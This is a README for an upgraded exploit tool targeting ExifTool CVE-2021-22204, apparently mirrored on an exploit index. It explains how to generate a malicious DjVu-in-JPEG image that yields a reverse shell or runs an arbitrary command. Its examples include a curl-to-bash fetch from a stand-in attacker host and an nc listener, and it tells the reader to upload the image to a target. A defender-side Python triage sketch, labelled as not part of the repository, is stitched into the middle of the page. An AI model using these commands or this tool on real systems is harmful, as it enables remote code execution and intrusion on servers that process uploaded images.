## https://sploitus.com/exploit?id=A0F6718E-3F97-524C-8420-8BD056FE6751
# CVE-2021-22204 - ExifTool Arbitrary Code Execution

An upgraded exploit for CVE-2021-22204, a vulnerability in ExifTool versions 7.44 through 12.23 that allows arbitrary code execution when processing malicious DjVu files.

## Description

Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 to 12.23 allows arbitrary code execution when parsing a malicious image. This exploit generates a malicious image file that, when processed by a vulnerable ExifTool version, executes attacker-controlled code.

## Improvements Over Original

This is an upgraded version inspired by [UNICORDev/exploit-CVE-2021-22204](https://github.com/UNICORDev/exploit-CVE-2021-22204), with the following improvements:

- **No ExifTool dependency on attacker machine** - The original exploit uses `exiftool -config` to embed the payload, which fails if your ExifTool is patched (v12.24+). This version creates a pure DjVu payload using only `djvumake`.
- **Works on modern Kali** - Compatible with Python 3.12+ (fixes `\c` escape sequence warning)
- **Minimal dependencies** - Only requires `djvulibre-bin` package
- **Clean, minimal code** - No ASCII art or artificial delays

## Requirements

```bash
sudo apt install djvulibre-bin
```

## Usage

**Reverse Shell:**
```bash
python3 exploit.py -s <ip> <port>
```

**Custom Command:**
```bash
python3 exploit.py -c "id > /tmp/pwned"
```

**Examples:**
```bash
# Generate reverse shell payload
python3 exploit.py -s 192.168.1.100 4444

# Generate command execution payload  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Start listener and wait for callback
nc -nlvp 4444
```

The exploit generates `image.jpg` - upload this to a target where ExifTool will process it.

## Affected Versions

- ExifTool 7.44 - 12.23
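
For defenders, a triage sketch (an added example, not part of this repository or of ExifTool): it checks whether an installed ExifTool version falls in the affected range above, and flags uploads like the `image.jpg` described earlier, whose bytes are DjVu despite an image extension. The function names, the extension list and the sample bytes are assumptions constructed for illustration.

```python
"""Defender-side triage for CVE-2021-22204 (added example, not the project's code)."""
from decimal import Decimal, InvalidOperation
from pathlib import Path

# Affected range as stated on this page: ExifTool 7.44 through 12.23.
FIRST_AFFECTED, LAST_AFFECTED = Decimal("7.44"), Decimal("12.23")
# DjVu files begin with the "AT&T" magic followed by an IFF "FORM" chunk.
DJVU_MAGIC = b"AT&TFORM"
# Extensions under which an upload pipeline would not expect DjVu data (assumed list).
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".tif", ".tiff", ".webp"}


def is_affected_version(version_text: str) -> bool:
    """True if the output of `exiftool -ver` lies in the affected range."""
    try:
        version = Decimal(version_text.strip())
    except InvalidOperation:
        raise ValueError(f"unrecognised ExifTool version: {version_text!r}")
    return FIRST_AFFECTED <= version <= LAST_AFFECTED


def triage_upload(name: str, data: bytes) -> list[str]:
    """Return findings for one uploaded file; an empty list means nothing flagged."""
    findings: list[str] = []
    if not data.startswith(DJVU_MAGIC):
        return findings
    # Metadata tools pick a parser from content, so the extension is no safeguard.
    if Path(name).suffix.lower() in IMAGE_EXTS:
        findings.append("extension/content mismatch: DjVu data in an image-named file")
    # ANTa / ANTz are the DjVu annotation chunk IDs (text metadata a reader parses).
    if b"ANTa" in data or b"ANTz" in data:
        findings.append("DjVu annotation chunk present (ANTa/ANTz)")
    return findings


if __name__ == "__main__":
    # Constructed sample: a bare DjVu header with an annotation chunk ID, no payload.
    sample = DJVU_MAGIC + (0).to_bytes(4, "big") + b"DJVUANTa"
    print("12.23 affected:", is_affected_version("12.23"))
    print("12.24 affected:", is_affected_version("12.24"))
    for finding in triage_upload("image.jpg", sample):
        print("image.jpg:", finding)
```

A flagged file is a reason to quarantine it and keep it away from any ExifTool older than 12.24; the byte search for annotation chunk IDs is a coarse heuristic and can match unrelated data.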

## References

- [CVE-2021-22204](https://nvd.nist.gov/vuln/detail/CVE-2021-22204)
- [ExifTool Advisory](https://exiftool.org/history.html#12.24)
- [Original UNICORD Exploit](https://github.com/UNICORDev/exploit-CVE-2021-22204)

## Disclaimer

This tool is provided for **educational and authorized security testing purposes only**.

The author is not responsible for any misuse or damage caused by this tool. Only use this exploit against systems you own or have explicit written permission to test.

Unauthorized access to computer systems is illegal and punishable by law. Use responsibly.

## License

MIT License - See [LICENSE](LICENSE) file.

## Credits

- Original exploit concept by [UNICORD (NicPWNs & Dev-Yeoj)](https://github.com/UNICORDev/exploit-CVE-2021-22204)
- Upgraded version by [d4ytox](https://github.com/d4ytox)